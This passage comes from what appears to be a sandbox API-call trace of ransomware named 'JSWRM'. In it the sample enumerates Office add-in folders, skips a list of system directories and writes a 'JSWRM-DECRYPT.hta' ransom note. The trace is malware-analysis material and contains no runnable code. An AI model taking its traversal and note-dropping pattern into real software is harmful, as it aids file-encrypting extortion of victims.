dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0123.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0123.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0123.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244f90 [0123.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2450c8 | out: hHeap=0x1e0000) returned 1 [0123.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.171] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc43098a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc43098a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc43098a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x87040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.172] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.172] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.172] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.172] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.172] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.172] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.172] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.172] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.172] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.172] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0123.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0123.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0123.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0123.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f030 [0123.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244f90 | out: hHeap=0x1e0000) returned 1 [0123.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.172] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc43098a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc43098a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc43098a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x87040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 0 [0123.172] FindClose (in: hFindFile=0x231ec0 | out: hFindFile=0x231ec0) returned 1 [0123.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0123.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bbc0 | out: hHeap=0x1e0000) returned 1 [0123.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0123.172] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa89f599, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6270fd0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6270fd0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="it", cAlternateFileName="")) returned 1 [0123.172] lstrcmpiW (lpString1="it", lpString2=".") returned 1 [0123.173] lstrcmpiW (lpString1="it", lpString2="..") returned 1 [0123.173] lstrcmpiW (lpString1="it", lpString2="...") returned 1 [0123.173] lstrcmpiW (lpString1="it", lpString2="windows") returned -1 [0123.173] lstrcmpiW (lpString1="it", lpString2="recovery") returned -1 [0123.173] lstrcmpiW (lpString1="it", lpString2="perflogs") returned -1 [0123.173] lstrcmpiW (lpString1="it", lpString2="documents and settings") returned 1 [0123.173] lstrcmpiW (lpString1="it", lpString2="$RECYCLE.BIN") returned 1 [0123.173] lstrcmpiW (lpString1="it", lpString2="system volume information") returned -1 [0123.173] lstrcmpiW (lpString1="it", lpString2="msocache") returned -1 [0123.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0123.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0123.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b2b0 [0123.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0123.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0123.173] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\it\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\it\\jswrm-decrypt.hta")) returned 0xffffffff [0123.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0123.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24f1e0 [0123.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0123.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x250fb0 [0123.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0123.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0123.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0123.176] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\it\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\it\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.178] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.178] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.179] CloseHandle (hObject=0x338) returned 1 [0123.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x250fb0 | out: hHeap=0x1e0000) returned 1 [0123.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b2b0 | out: hHeap=0x1e0000) returned 1 [0123.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b480 [0123.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bbc0 [0123.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0123.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0123.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0123.179] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\it\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\it\\jswrm-decrypt.hta")) returned 0x20 [0123.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0123.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0123.179] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\it\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa89f599, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6270fd0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4014e432, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x231ac0 [0123.180] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.180] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa89f599, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6270fd0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4014e432, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.180] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.180] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.180] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4014e432, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4014e432, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4014e432, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.180] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.180] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.180] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.180] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.180] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.180] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.180] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.180] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.180] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.180] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0123.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0123.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0123.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0123.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0123.180] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc240ad7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc240ad7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc2b31ff, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xeaa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.180] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.180] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.180] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.180] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.181] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.181] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.181] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.181] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.181] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.181] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0123.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0123.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0123.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0123.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x2450c8 [0123.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.181] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5fc257f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5fc257f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6034d6e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x28040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.181] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.181] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.181] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.181] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.181] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.181] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.181] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.181] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.181] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.181] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0123.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0123.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0123.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0123.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244978 [0123.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2450c8 | out: hHeap=0x1e0000) returned 1 [0123.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.182] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6270fd0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6270fd0, 